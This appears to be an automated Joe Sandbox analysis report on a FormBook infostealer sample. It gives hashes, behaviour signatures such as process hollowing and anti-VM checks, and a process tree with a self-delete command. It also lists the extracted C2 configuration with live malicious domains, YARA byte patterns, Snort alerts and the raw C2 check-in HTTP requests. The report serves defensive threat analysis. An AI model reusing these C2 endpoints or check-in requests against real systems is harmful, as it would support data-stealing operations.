Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
881SP1exr1.exe

Overview

General Information

Sample Name:881SP1exr1.exe
Original Sample Name:fc8b3a3005cdc80ce19af33a57010fa8.exe
Analysis ID:1332500
MD5:fc8b3a3005cdc80ce19af33a57010fa8
SHA1:b3303ebe7263a55a61e80407706711ca0727e496
SHA256:66e461f8245be149d5a3826d29c170d5960ade477be127c0fe2bc315e26067a3
Tags:32exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • 881SP1exr1.exe (PID: 7264 cmdline: C:\Users\user\Desktop\881SP1exr1.exe MD5: FC8B3A3005CDC80CE19AF33A57010FA8)
    • 881SP1exr1.exe (PID: 7420 cmdline: C:\Users\user\Desktop\881SP1exr1.exe MD5: FC8B3A3005CDC80CE19AF33A57010FA8)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • chkdsk.exe (PID: 7464 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)
          • cmd.exe (PID: 7548 cmdline: /c del "C:\Users\user\Desktop\881SP1exr1.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.iqixuehe.com/4hc5/"], "decoy": ["amandaastburyillustration.com", "7141999.com", "showshoe.info", "sagemarlin.com", "lithuaniandreamtime.com", "therenixgroupllc.com", "avalialooks.shop", "vurporn.com", "lemmy.systems", "2816goldfinch.com", "pacersun.com", "checktrace.com", "loadtransfer.site", "matsuri-jujutsukaisen.com", "iontrapper.science", "5108010.com", "beidixi.com", "21305599.com", "peakvitality.fitness", "osisfeelingfee.com", "hotshark-shop.com", "bollywood.nexus", "stephenplattassociatesllp.com", "bakepreneurs.com", "claudiobarros.online", "akabou-hayasaka.com", "collibrishop.online", "britishfemalevo.com", "prestigesmp.online", "wzmatics.com", "sactribune.com", "slotjitu88.website", "theproactiveexpat.com", "therealnikib.com", "elnoh.life", "tianyan110.com", "tcbbuilds.com", "zhe276.com", "c1405.com", "candicrem.com", "lambdasigmarho.com", "gemwhk.store", "crissmendez.com", "locduongseafood.com", "jessformdsenate.info", "329.bio", "nbgonghe.com", "tr-ij.com", "quailrun-inc.com", "pathlightpropertiesmgt.com", "lpqxmz.site", "castlegrouplt.com", "beautybylily.com", "bernabeicarniceriaygranja.com", "spicax.com", "globalentertainmentservices.com", "modluxenwa.com", "imaswe.com", "hntv6201.top", "homerevamps.today", "motionmixmedia.com", "antojitoslosramos.com", "julieslive.com", "bepnuclasechia.com"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 24 entries
      SourceRuleDescriptionAuthorStrings
      2.2.881SP1exr1.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.881SP1exr1.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.881SP1exr1.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          2.2.881SP1exr1.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.881SP1exr1.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18809:$sqlite3step: 68 34 1C 7B E1
          • 0x1891c:$sqlite3step: 68 34 1C 7B E1
          • 0x18838:$sqlite3text: 68 38 2A 90 C5
          • 0x1895d:$sqlite3text: 68 38 2A 90 C5
          • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries
          No Sigma rule has matched
          Timestamp:192.168.2.4154.205.127.20149751802031412 10/26/23-09:49:19.774091
          SID:2031412
          Source Port:49751
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.434.68.234.449753802031412 10/26/23-09:50:00.519357
          SID:2031412
          Source Port:49753
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4154.86.64.9649754802031412 10/26/23-09:50:21.217300
          SID:2031412
          Source Port:49754
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.43.64.163.5049747802031412 10/26/23-09:47:37.390469
          SID:2031412
          Source Port:49747
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4199.34.228.19149752802031412 10/26/23-09:49:39.892248
          SID:2031412
          Source Port:49752
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4167.172.228.2649755802031412 10/26/23-09:50:41.435579
          SID:2031412
          Source Port:49755
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.491.195.240.1949743802031412 10/26/23-09:47:16.596276
          SID:2031412
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.445.64.97.6049750802031412 10/26/23-09:48:59.501363
          SID:2031412
          Source Port:49750
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.413.32.208.7249749802031412 10/26/23-09:48:38.253900
          SID:2031412
          Source Port:49749
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4103.120.80.11149748802031412 10/26/23-09:47:58.535070
          SID:2031412
          Source Port:49748
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.iqixuehe.com/4hc5/"], "decoy": ["amandaastburyillustration.com", "7141999.com", "showshoe.info", "sagemarlin.com", "lithuaniandreamtime.com", "therenixgroupllc.com", "avalialooks.shop", "vurporn.com", "lemmy.systems", "2816goldfinch.com", "pacersun.com", "checktrace.com", "loadtransfer.site", "matsuri-jujutsukaisen.com", "iontrapper.science", "5108010.com", "beidixi.com", "21305599.com", "peakvitality.fitness", "osisfeelingfee.com", "hotshark-shop.com", "bollywood.nexus", "stephenplattassociatesllp.com", "bakepreneurs.com", "claudiobarros.online", "akabou-hayasaka.com", "collibrishop.online", "britishfemalevo.com", "prestigesmp.online", "wzmatics.com", "sactribune.com", "slotjitu88.website", "theproactiveexpat.com", "therealnikib.com", "elnoh.life", "tianyan110.com", "tcbbuilds.com", "zhe276.com", "c1405.com", "candicrem.com", "lambdasigmarho.com", "gemwhk.store", "crissmendez.com", "locduongseafood.com", "jessformdsenate.info", "329.bio", "nbgonghe.com", "tr-ij.com", "quailrun-inc.com", "pathlightpropertiesmgt.com", "lpqxmz.site", "castlegrouplt.com", "beautybylily.com", "bernabeicarniceriaygranja.com", "spicax.com", "globalentertainmentservices.com", "modluxenwa.com", "imaswe.com", "hntv6201.top", "homerevamps.today", "motionmixmedia.com", "antojitoslosramos.com", "julieslive.com", "bepnuclasechia.com"]}
          Source: 881SP1exr1.exeReversingLabs: Detection: 22%
          Source: 881SP1exr1.exeVirustotal: Detection: 34%Perma Link
          Source: Yara matchFile source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.candicrem.com/4hc5/Avira URL Cloud: Label: malware
          Source: http://www.tcbbuilds.com/4hc5/www.therealnikib.comAvira URL Cloud: Label: malware
          Source: http://www.vurporn.comAvira URL Cloud: Label: malware
          Source: http://www.7141999.com/4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0Avira URL Cloud: Label: malware
          Source: http://www.lpqxmz.site/4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2Avira URL Cloud: Label: phishing
          Source: http://www.quailrun-inc.comAvira URL Cloud: Label: malware
          Source: http://www.showshoe.info/4hc5/Avira URL Cloud: Label: malware
          Source: http://www.quailrun-inc.com/4hc5/Avira URL Cloud: Label: malware
          Source: http://www.bollywood.nexusAvira URL Cloud: Label: malware
          Source: http://www.modluxenwa.comAvira URL Cloud: Label: malware
          Source: http://www.therealnikib.comAvira URL Cloud: Label: malware
          Source: www.iqixuehe.com/4hc5/Avira URL Cloud: Label: malware
          Source: http://www.lpqxmz.site/4hc5/www.tcbbuilds.comAvira URL Cloud: Label: phishing
          Source: http://www.bollywood.nexus/4hc5/www.lpqxmz.siteAvira URL Cloud: Label: malware
          Source: http://www.motionmixmedia.com/4hc5/www.castlegrouplt.comAvira URL Cloud: Label: malware
          Source: http://www.7141999.comAvira URL Cloud: Label: malware
          Source: http://www.7141999.com/4hc5/Avira URL Cloud: Label: malware
          Source: http://www.modluxenwa.com/4hc5/www.vurporn.comAvira URL Cloud: Label: malware
          Source: http://www.slotjitu88.websiteAvira URL Cloud: Label: phishing
          Source: http://www.iqixuehe.com/4hc5/www.candicrem.comAvira URL Cloud: Label: malware
          Source: http://www.therenixgroupllc.com/4hc5/www.7141999.comAvira URL Cloud: Label: malware
          Source: http://www.therealnikib.com/4hc5/Avira URL Cloud: Label: malware
          Source: http://www.therenixgroupllc.com/4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8eAvira URL Cloud: Label: malware
          Source: http://www.therealnikib.com/4hc5/www.slotjitu88.websiteAvira URL Cloud: Label: malware
          Source: http://www.vurporn.com/4hc5/Avira URL Cloud: Label: malware
          Source: http://www.vurporn.com/4hc5/www.motionmixmedia.comAvira URL Cloud: Label: malware
          Source: http://www.lpqxmz.siteAvira URL Cloud: Label: malware
          Source: http://www.motionmixmedia.com/4hc5/Avira URL Cloud: Label: malware
          Source: http://www.pacersun.comAvira URL Cloud: Label: malware
          Source: http://www.7141999.com/4hc5/www.pacersun.comAvira URL Cloud: Label: malware
          Source: http://www.modluxenwa.com/4hc5/Avira URL Cloud: Label: malware
          Source: http://www.pacersun.com/4hc5/Avira URL Cloud: Label: malware
          Source: http://www.tcbbuilds.comAvira URL Cloud: Label: malware
          Source: http://www.pacersun.com/4hc5/www.showshoe.infoAvira URL Cloud: Label: malware
          Source: http://www.candicrem.com/4hc5/www.therenixgroupllc.comAvira URL Cloud: Label: malware
          Source: http://www.iqixuehe.com/4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQvAvira URL Cloud: Label: malware
          Source: http://www.quailrun-inc.com/4hc5/www.bollywood.nexusAvira URL Cloud: Label: malware
          Source: www.candicrem.comVirustotal: Detection: 11%Perma Link
          Source: 881SP1exr1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 881SP1exr1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: chkdsk.pdbGCTL source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, 881SP1exr1.exe, 00000002.00000002.1699968102.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4088729224.0000000000330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: chkdsk.pdb source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, 881SP1exr1.exe, 00000002.00000002.1699968102.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4088729224.0000000000330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 881SP1exr1.exe, 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1699296341.0000000005574000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1701280255.0000000005722000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 881SP1exr1.exe, 881SP1exr1.exe, 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000004.00000003.1699296341.0000000005574000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1701280255.0000000005722000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: CgWC.pdbSHA256 source: 881SP1exr1.exe
          Source: Binary string: CgWC.pdb source: 881SP1exr1.exe
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 4x nop then pop ebx2_2_00407B1C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop ebx4_2_05047B1C

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 34.68.234.4 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.205.127.201 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.86.64.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.19 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.64.97.60 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.120.80.111 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 167.172.228.26 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 199.34.228.191 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 13.32.208.72 80Jump to behavior
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49743 -> 91.195.240.19:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49747 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49748 -> 103.120.80.111:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49749 -> 13.32.208.72:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 45.64.97.60:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49751 -> 154.205.127.201:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 199.34.228.191:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49753 -> 34.68.234.4:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49754 -> 154.86.64.96:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49755 -> 167.172.228.26:80
          Source: Malware configuration extractorURLs: www.iqixuehe.com/4hc5/
          Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=/VQHqX0ksQJGmUtuF+SmenrWXhlVL4nIAkrjzD1bv3XMK1Eb428apYspiXxzNiZFnR1c HTTP/1.1Host: www.quailrun-inc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?P6=aEvA5DdolFnSpG3wqqUvIRZQPhFuP/nqnfvGSsdAIfGqv2pNtxEQnoAbm37B6N+rsMpI&ntxh9=V48LzvX0 HTTP/1.1Host: www.bollywood.nexusConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2 HTTP/1.1Host: www.lpqxmz.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=ZsWAow+yf8BBfalQduY7CMj5L6CLJOwgwJ6AETMAgkoaDSvJRnGnN78buAKwp8K6m6Gx HTTP/1.1Host: www.therealnikib.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?P6=Td1U1SjQUadfC3cbiTsqgzapHPyB/huuK+NgSE3DJAe+OSZ8lo2ZhtJstkIbAvBbRddo&ntxh9=V48LzvX0 HTTP/1.1Host: www.slotjitu88.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQv HTTP/1.1Host: www.iqixuehe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?P6=tOmE+Tzzb7HQLc2SkeB2EXcbcJrVSgBrP2Nr0WPSkAyRu+Yjx9aruD7HNlgfCbohliLP&ntxh9=V48LzvX0 HTTP/1.1Host: www.candicrem.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e HTTP/1.1Host: www.therenixgroupllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0 HTTP/1.1Host: www.7141999.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=YIoXQxIAORK6HEHBIjyMxPOX2glibAcKMS7MvCp7xLT7Ek+j4imqU/IlDY2a3gBqxYgb HTTP/1.1Host: www.pacersun.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 154.205.127.201 154.205.127.201
          Source: Joe Sandbox ViewIP Address: 167.172.228.26 167.172.228.26
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Oct 2023 07:50:22 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: explorer.exe, 00000003.00000002.4094650297.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421243113.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106023617.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000002.4094650297.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421243113.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106023617.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000002.4094650297.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421243113.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106023617.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
